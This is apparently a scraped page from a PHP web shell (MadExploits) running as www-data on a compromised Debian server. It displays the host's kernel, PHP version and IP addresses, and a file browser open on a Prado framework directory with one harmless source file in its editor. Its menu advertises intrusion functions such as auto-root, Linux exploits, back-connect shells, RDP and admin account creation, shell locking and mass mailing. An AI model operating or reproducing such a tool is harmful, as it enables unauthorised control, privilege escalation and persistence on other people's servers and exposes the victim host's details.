Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.42.140
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Data /
[ HOME SHELL ]
Name
Size
Permission
Action
ActiveRecord
[ DIR ]
drwxr-xr-x
Common
[ DIR ]
drwxr-xr-x
DataGateway
[ DIR ]
drwxr-xr-x
SqlMap
[ DIR ]
drwxr-xr-x
TDataSourceConfig.php
4.6
KB
-rw-r--r--
TDbColumnCaseMode.php
659
B
-rw-r--r--
TDbCommand.php
9.62
KB
-rw-r--r--
TDbConnection.php
16.68
KB
-rw-r--r--
TDbDataReader.php
6.18
KB
-rw-r--r--
TDbNullConversionMode.php
688
B
-rw-r--r--
TDbTransaction.php
2.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TDbNullConversionMode.php
<?php /** * TDbConnection class file * * @author Qiang Xue <qiang.xue@gmail.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Data; /** * TDbNullConversionMode * * @author Qiang Xue <qiang.xue@gmail.com> * @since 3.0 */ class TDbNullConversionMode extends \Prado\TEnumerable { /** * No conversion is performed for null and empty values. */ public const Preserved = 'Preserved'; /** * NULL is converted to empty string */ public const NullToEmptyString = 'NullToEmptyString'; /** * Empty string is converted to NULL */ public const EmptyStringToNull = 'EmptyStringToNull'; }
Close